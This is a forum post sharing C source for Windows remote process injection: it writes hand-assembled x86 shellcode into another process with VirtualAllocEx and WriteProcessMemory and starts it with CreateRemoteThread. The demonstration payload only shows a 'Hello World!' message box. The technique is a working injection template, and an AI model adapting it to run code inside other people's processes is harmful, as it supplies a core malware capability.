• 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[C] Process Injection (MessageBox Example)
#1
Code:
typedef struct _INJECT
{
    char szCaption[32];
    char szMessage[128];

    FARPROC fMessageBox;
    FARPROC fExitThread;

} INJECT, *PINJECT, *LPINJECT;

void InjectRemoteCode(unsigned long ulProcessId)
{
    /* By: og__ */

    char szShellcode[] = {
        "\x56"                        // PUSH ESI
        "\x8B\x74\x24\x08"            // MOV ESI,DWORD PTR SS:[ESP+8]
        "\x6A\x00"                    // PUSH 0
        "\x8D\x46\x20"                // LEA EAX,DWORD PTR DS:[ESI+20]
        "\x56"                        // PUSH ESI
        "\x50"                        // PUSH EAX
        "\x6A\x00"                    // PUSH 0
        "\xFF\x96\xA0\x00\x00\x00"    // CALL DWORD PTR DS:[ESI+A0]
        "\x6A\x00"                    // PUSH 0
        "\xFF\x96\xA4\x00\x00\x00"    // CALL DWORD PTR DS:[ESI+A4]
        "\x5E"                        // POP ESI
    };

    INJECT *lpInject = NULL;
    HANDLE hProcess, hThread;
    void *lpRemoteInfo = NULL, *lpRemoteCode = NULL;

    __try
    {
        if ((hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, ulProcessId)) == NULL)
            return;

        if ((lpInject = (INJECT *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(INJECT))) == NULL)
            __leave;

        strcpy(lpInject->szCaption, "Message Box");
        strcpy(lpInject->szMessage, "Hello World!");

        lpInject->fMessageBox = GetProcAddress(GetModuleHandle("USER32.DLL"), "MessageBoxA");
        lpInject->fExitThread = GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "ExitThread");

        if ((lpRemoteInfo = VirtualAllocEx(hProcess, NULL, sizeof(INJECT), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) == NULL)
            __leave;

        if (WriteProcessMemory(hProcess, lpRemoteInfo, lpInject, sizeof(INJECT),  0) == 0)
            __leave;

        if ((lpRemoteCode = VirtualAllocEx(hProcess, NULL, sizeof(szShellcode) - 1, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL)
            __leave;

        if (WriteProcessMemory(hProcess, lpRemoteCode, szShellcode, sizeof(szShellcode) - 1,  0) == 0)
            __leave;

        hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpRemoteCode, lpRemoteInfo, 0, NULL);
    }

    __finally
    {
        if (hThread != 0)
            CloseHandle(hThread);

        if (lpInject != NULL)
            HeapFree(GetProcessHeap(), 0, lpInject);

        CloseHandle(hProcess);
    }
    return;
}
  Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  [c] Process Hiding Amin_Mansouri 0 2,698 10-16-2011، 08:48 PM
Last Post: Amin_Mansouri

Forum Jump:


Users browsing this thread: 1 Guest(s)

MyBB SQL Error

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
1017 - Can't find file: './pxramin_parsii/mybb_threadviews.MYI' (errno: 2 "No such file or directory")
Query:
INSERT INTO mybb_threadviews (tid) VALUES('1482')